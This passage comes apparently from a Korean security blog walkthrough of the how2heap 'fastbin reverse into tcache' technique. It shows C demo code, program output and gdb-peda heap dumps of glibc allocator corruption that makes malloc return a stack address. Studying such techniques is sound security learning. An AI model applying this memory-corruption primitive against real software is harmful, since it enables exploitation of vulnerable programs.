0x55500000c309 None\ngdb-peda$ heapinfo\n(0x20) fastbin[0]: 0x0\n(0x30) fastbin[1]: 0x0\n(0x40) fastbin[2]: 0x0\n(0x50) fastbin[3]: 0x5555555596a0 --> 0x555555559650 --> 0x555555559600 --> 0x5555555595b0 --> 0x555555559560 --> 0x555555559510 --> 0x5555555594c0 --> 0x7fffffffdfc0 (size error (0xcdcdcdcdcdcdcdc8)) --> 0xcdcdcdca32323230 (invaild memory)\n(0x60) fastbin[4]: 0x0\n(0x70) fastbin[5]: 0x0\n(0x80) fastbin[6]: 0x0\n(0x90) fastbin[7]: 0x0\n(0xa0) fastbin[8]: 0x0\n(0xb0) fastbin[9]: 0x0\n top: 0x5555555596f0 (size : 0x20910)\n last_remainder: 0x0 (size : 0x0)\n unsortbin: 0x0\n(0x50) tcache_entry[3](7): 0x555555559480 --> 0x555555559430 --> 0x5555555593e0 --> 0x555555559390 --> 0x555555559340 --> 0x5555555592f0 --> 0x5555555592a0\ngdb-peda$<\/pre>\n\n\n\n
![\"\"](\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/05\/image-36-1024x270.png\")
<\/figure>\n\n\n\n6.<\/h3>\n\n\n\n
\tprintf(\"The next step is to malloc(allocsize) 7 times to empty the tcache.\\n\\n\");\n\t\n\t\/\/ Empty tcache.\n\tfor (i = 0; i < 7; i++) ptrs[i] = malloc(allocsize);<\/pre>\n\n\n\n
The next step is to malloc(allocsize) 7 times to empty the tcache.<\/pre>\n\n\n\n
gdb-peda$ parseheap\naddr prev size status fd bk \n0x555555559000 0x0 0x290 Used None None\n0x555555559290 0x0 0x50 Freed 0x555555559 None\n0x5555555592e0 0x0 0x50 Freed 0x55500000c7f9 None\n0x555555559330 0x0 0x50 Freed 0x55500000c7a9 None\n0x555555559380 0x0 0x50 Freed 0x55500000c619 None\n0x5555555593d0 0x0 0x50 Freed 0x55500000c6c9 None\n0x555555559420 0x0 0x50 Freed 0x55500000c6b9 None\n0x555555559470 0x0 0x50 Freed 0x55500000c169 None\n0x5555555594c0 0x0 0x50 Freed 0x7ffaaaaa8a99 None\n0x555555559510 0x0 0x50 Freed 0x55500000c199 None\n0x555555559560 0x0 0x50 Freed 0x55500000c049 None\n0x5555555595b0 0x0 0x50 Freed 0x55500000c039 None\n0x555555559600 0x0 0x50 Freed 0x55500000c0e9 None\n0x555555559650 0x0 0x50 Freed 0x55500000c359 None\n0x5555555596a0 0x0 0x50 Freed 0x55500000c309 None\ngdb-peda$ heapinfo\n(0x20) fastbin[0]: 0x0\n(0x30) fastbin[1]: 0x0\n(0x40) fastbin[2]: 0x0\n(0x50) fastbin[3]: 0x5555555596a0 --> 0x555555559650 --> 0x555555559600 --> 0x5555555595b0 --> 0x555555559560 --> 0x555555559510 --> 0x5555555594c0 --> 0x7fffffffdfc0 (size error (0xcdcdcdcdcdcdcdc8)) --> 0xcdcdcdca32323230 (invaild memory)\n(0x60) fastbin[4]: 0x0\n(0x70) fastbin[5]: 0x0\n(0x80) fastbin[6]: 0x0\n(0x90) fastbin[7]: 0x0\n(0xa0) fastbin[8]: 0x0\n(0xb0) fastbin[9]: 0x0\n top: 0x5555555596f0 (size : 0x20910)\n last_remainder: 0x0 (size : 0x0)\n unsortbin: 0x0\ngdb-peda$<\/pre>\n\n\n\n
gdb-peda$ x\/32gx $rbp-0x80\n0x7fffffffdff0: 0x0000555555559480 0x0000555555559430\n0x7fffffffe000: 0x00005555555593e0 0x0000555555559390\n0x7fffffffe010: 0x0000555555559340 0x00005555555592f0\n0x7fffffffe020: 0x00005555555592a0<\/pre>\n\n\n\n
![\"\"](\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/05\/image-37.png\")
<\/figure>\n\n\n\n7.<\/h3>\n\n\n\n
\uc544\uc9c1 \uc218\uc815\ub418\uc9c0 \uc54a\uc558\ub2e4\ub294 \uac83\uc744 \ubcf4\uc5ec\uc8fc\uae30 \uc704\ud568\uc785\ub2c8\ub2e4.<\/p>\n\n\n\n\tprintf(\"Let's just print the contents of our array on the stack now,\\n\"\n\t\t\t\"to show that it hasn't been modified yet.\\n\\n\");\n\t\n\tfor (i = 0; i < 6; i++) printf(\"%p: %p\\n\", &stack_var[i], (char*)stack_var[i]);<\/pre>\n\n\n\n
Let's just print the contents of our array on the stack now,\nto show that it hasn't been modified yet.\n\n0x7fffffffdfc0: 0xcdcdcdcdcdcdcdcd\n0x7fffffffdfc8: 0xcdcdcdcdcdcdcdcd\n0x7fffffffdfd0: 0xcdcdcdcdcdcdcdcd\n0x7fffffffdfd8: 0xcdcdcdcdcdcdcdcd\n0x7fffffffdfe0: 0xcdcdcdcdcdcdcdcd\n0x7fffffffdfe8: 0xcdcdcdcdcdcdcdcd<\/pre>\n\n\n\n
8.<\/h3>\n\n\n\n
malloc(0x40)<\/code>\ud558\uba74, stack_var[2] ~ [3]<\/code> \uac12\uc774 \ubcc0\uc870\ub428.<\/strong>
\ud799 \ud3ec\uc778\ud130\uac00 \uc2a4\ud0dd\uc5d0 \uc4f0\uc774\ub294\ub4ef. <\/strong><\/p>\n\n\n\nstack_var[2]<\/code> \uac12\uc740 0x5552aaaa6b2d<\/code>. <\/strong>stack_var[3]<\/code> \uac12\uc740 0x5bceaada58f8f2d8<\/code>.<\/strong><\/p>\n\n\n\ntcache<\/code>\ub294 \ube44\uc5b4 \uc788\uc9c0\ub9cc fastbin<\/code>\uc740 \ube44\uc5b4 \uc788\uc9c0 \uc54a\uae30 \ub54c\ubb38\uc5d0, \ub2e4\uc74c \ud560\ub2f9\uc740 fastbin<\/code>\uc5d0\uc11c \uac00\uc838\uc635\ub2c8\ub2e4.
\ub610\ud55c fastbin<\/code>\uc5d0 \uc788\ub294 7\uac1c\uc758 \uccad\ud06c\uac00 tcache<\/code>\ub97c \ub2e4\uc2dc \ucc44\uc6b0\uae30 \uc704\ud574 \uc0ac\uc6a9\ub429\ub2c8\ub2e4.<\/p>\n\n\n\ntcache<\/code>\uc5d0 \ubcf5\uc0ac\ub418\ubbc0\ub85c,
\uc6b0\ub9ac\uac00 \ud0c0\uac9f\uc73c\ub85c \uc0bc\uc740 \uc2a4\ud0dd \uc8fc\uc18c\uac00 tcache<\/code>\uc758 \uccab \ubc88\uc9f8 \uccad\ud06c\uac00 \ub429\ub2c8\ub2e4.<\/p>\n\n\n\n
\ud799 \ud3ec\uc778\ud130\uac00 \uc2a4\ud0dd\uc5d0 \uc4f0\uc774\uac8c \ub429\ub2c8\ub2e4.<\/p>\n\n\n\nfastbin<\/code>\uc5d0 6\uac1c \ubbf8\ub9cc\uc758 \ud3ec\uc778\ud130\ub97c free<\/code>\ud558\ub354\ub77c\ub3c4 \uacf5\uaca9\uc774 \uc791\ub3d9\ud55c\ub2e4\uace0 \ub9d0\ud588\ub294\ub370,
\uc774\ub294 \uc2a4\ud0dd\uc5d0 \uc788\ub294 \uac12\uc774 0\uc77c \ub54c\ub9cc \uac00\ub2a5\ud569\ub2c8\ub2e4.<\/p>\n\n\n\n
\uc720\ud6a8\ud55c \ud3ec\uc778\ud130\uac00 \uc544\ub2c8\uac70\ub098 null\uc774 \uc544\ub2d0 \uacbd\uc6b0 \ucda9\ub3cc\uc774 \ubc1c\uc0dd\ud558\uae30 \ub54c\ubb38\uc785\ub2c8\ub2e4.<\/p>\n\n\n\nprintf(\"\\n\"\n\t\t \"The next allocation triggers the stack to be overwritten. The tcache\\n\"\n\t\t \"is empty, but the fastbin isn't, so the next allocation comes from the\\n\"\n\t\t \"fastbin. Also, 7 chunks from the fastbin are used to refill the tcache.\\n\"\n\t\t \"Those 7 chunks are copied in reverse order into the tcache, so the stack\\n\"\n\t\t \"address that we are targeting ends up being the first chunk in the tcache.\\n\"\n\t\t \"It contains a pointer to the next chunk in the list, which is why a heap\\n\"\n\t\t \"pointer is written to the stack.\\n\"\n\t\t \"\\n\"\n\t\t \"Earlier we said that the attack will also work if we free fewer than 6\\n\"\n\t\t \"extra pointers to the fastbin, but only if the value on the stack is zero.\\n\"\n\t\t \"That's because the value on the stack is treated as a next pointer in the\\n\"\n\t\t \"linked list and it will trigger a crash if it isn't a valid pointer or null.\\n\"\n\t\t \"\\n\"\n\t\t \"The contents of our array on the stack now look like this:\\n\\n\");\n\t\n\tmalloc(allocsize);\n\t\n for (i = 0; i < 6; i++) printf(\"%p: %p\\n\", &stack_var[i], (char*)stack_var[i]);<\/pre>\n\n\n\n
The next allocation triggers the stack to be overwritten. The tcache\nis empty, but the fastbin isn't, so the next allocation comes from the\nfastbin. Also, 7 chunks from the fastbin are used to refill the tcache.\nThose 7 chunks are copied in reverse order into the tcache, so the stack\naddress that we are targeting ends up being the first chunk in the tcache.\nIt contains a pointer to the next chunk in the list, which is why a heap\npointer is written to the stack.\n\nEarlier we said that the attack will also work if we free fewer than 6\nextra pointers to the fastbin, but only if the value on the stack is zero.\nThat's because the value on the stack is treated as a next pointer in the\nlinked list and it will trigger a crash if it isn't a valid pointer or null.\n\nThe contents of our array on the stack now look like this:\n\n0x7fffffffdfc0: 0xcdcdcdcdcdcdcdcd\n0x7fffffffdfc8: 0xcdcdcdcdcdcdcdcd\n0x7fffffffdfd0: 0x5552aaaa6b2d\n0x7fffffffdfd8: 0x5bceaada58f8f2d8\n0x7fffffffdfe0: 0xcdcdcdcdcdcdcdcd\n0x7fffffffdfe8: 0xcdcdcdcdcdcdcdcd<\/pre>\n\n\n\n
gdb-peda$ parseheap\naddr prev size status fd bk \n0x555555559000 0x0 0x290 Used None None\n0x555555559290 0x0 0x50 Freed 0x555555559 None\n0x5555555592e0 0x0 0x50 Freed 0x55500000c7f9 None\n0x555555559330 0x0 0x50 Freed 0x55500000c7a9 None\n0x555555559380 0x0 0x50 Freed 0x55500000c619 None\n0x5555555593d0 0x0 0x50 Freed 0x55500000c6c9 None\n0x555555559420 0x0 0x50 Freed 0x55500000c6b9 None\n0x555555559470 0x0 0x50 Freed 0x55500000c169 None\n0x5555555594c0 0x0 0x50 Freed 0x55500000c079 None\n0x555555559510 0x0 0x50 Freed 0x55500000c029 None\n0x555555559560 0x0 0x50 Freed 0x55500000c099 None\n0x5555555595b0 0x0 0x50 Freed 0x55500000c349 None\n0x555555559600 0x0 0x50 Freed 0x55500000c339 None\n0x555555559650 0x0 0x50 Freed 0x555555559 None\n0x5555555596a0 0x0 0x50 Used None None\ngdb-peda$ heapinfo\n(0x20) fastbin[0]: 0x0\n(0x30) fastbin[1]: 0x0\n(0x40) fastbin[2]: 0x0\n(0x50) fastbin[3]: 0xcdcdcdca32323230 (invaild memory)\n(0x60) fastbin[4]: 0x0\n(0x70) fastbin[5]: 0x0\n(0x80) fastbin[6]: 0x0\n(0x90) fastbin[7]: 0x0\n(0xa0) fastbin[8]: 0x0\n(0xb0) fastbin[9]: 0x0\n top: 0x5555555596f0 (size : 0x20910)\n last_remainder: 0x0 (size : 0x0)\n unsortbin: 0x0\n(0x50) tcache_entry[3](7): 0x7fffffffdfd0 --> 0x5555555594d0 --> 0x555555559520 --> 0x555555559570 --> 0x5555555595c0 --> 0x555555559610 --> 0x555555559660<\/pre>\n\n\n\n
![\"\"](\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/05\/image-38-1024x296.png\")
<\/figure>\n\n\n\n9.<\/h3>\n\n\n\n
malloc(0x40)<\/code>\ud558\uba74, \uc2a4\ud0dd \uc8fc\uc18c\ub85c \ud560\ub2f9\ubc1b\uc744 \uc218 \uc788\uc74c. <\/strong>stack_var[2]<\/code> \uc8fc\uc18c\ub85c \ud560\ub2f9\ubc1b\uc558\uc74c!<\/strong><\/p>\n\n\n\n char *q = malloc(allocsize);\n\tprintf(\"\\n\"\n\t\t\t\"Finally, if we malloc one more time then we get the stack address back: %p\\n\", q);\n\t\n\tassert(q == (char *)&stack_var[2]);\n\t\n\treturn 0;\n}<\/pre>\n\n\n\n
Finally, if we malloc one more time then we get the stack address back: 0x7fffffffdfd0<\/pre>\n\n\n\n
gdb-peda$ parseheap\naddr prev size status fd bk \n0x555555559000 0x0 0x290 Used None None\n0x555555559290 0x0 0x50 Freed 0x555555559 None\n0x5555555592e0 0x0 0x50 Freed 0x55500000c7f9 None\n0x555555559330 0x0 0x50 Freed 0x55500000c7a9 None\n0x555555559380 0x0 0x50 Freed 0x55500000c619 None\n0x5555555593d0 0x0 0x50 Freed 0x55500000c6c9 None\n0x555555559420 0x0 0x50 Freed 0x55500000c6b9 None\n0x555555559470 0x0 0x50 Freed 0x55500000c169 None\n0x5555555594c0 0x0 0x50 Freed 0x55500000c079 None\n0x555555559510 0x0 0x50 Freed 0x55500000c029 None\n0x555555559560 0x0 0x50 Freed 0x55500000c099 None\n0x5555555595b0 0x0 0x50 Freed 0x55500000c349 None\n0x555555559600 0x0 0x50 Freed 0x55500000c339 None\n0x555555559650 0x0 0x50 Freed 0x555555559 None\n0x5555555596a0 0x0 0x50 Used None None\ngdb-peda$ heapinfo\n(0x20) fastbin[0]: 0x0\n(0x30) fastbin[1]: 0x0\n(0x40) fastbin[2]: 0x0\n(0x50) fastbin[3]: 0xcdcdcdca32323230 (invaild memory)\n(0x60) fastbin[4]: 0x0\n(0x70) fastbin[5]: 0x0\n(0x80) fastbin[6]: 0x0\n(0x90) fastbin[7]: 0x0\n(0xa0) fastbin[8]: 0x0\n(0xb0) fastbin[9]: 0x0\n top: 0x5555555596f0 (size : 0x20910)\n last_remainder: 0x0 (size : 0x0)\n unsortbin: 0x0\n(0x50) tcache_entry[3](6): 0x5555555594d0 --> 0x555555559520 --> 0x555555559570 --> 0x5555555595c0 --> 0x555555559610 --> 0x555555559660\ngdb-peda$<\/pre>\n\n\n\n
gdb-peda$ x\/16gx 0x7fffffffdfc0\n0x7fffffffdfc0: 0xcdcdcdcdcdcdcdcd 0xcdcdcdcdcdcdcdcd\n0x7fffffffdfd0: 0x00005552aaaa6b2d 0x0000000000000000(\uc218\uc815\ub428(?))\n0x7fffffffdfe0: 0xcdcdcdcdcdcdcdcd 0xcdcdcdcdcdcdcdcd\n0x7fffffffdff0: 0x0000555555559480 0x0000555555559430\n0x7fffffffe000: 0x00005555555593e0 0x0000555555559390\n0x7fffffffe010: 0x0000555555559340 0x00005555555592f0\n0x7fffffffe020: 0x00005555555592a0 0x00005555555594d0\n0x7fffffffe030: 0x0000555555559520 0x0000555555559570<\/pre>\n","protected":false},"excerpt":{"rendered":"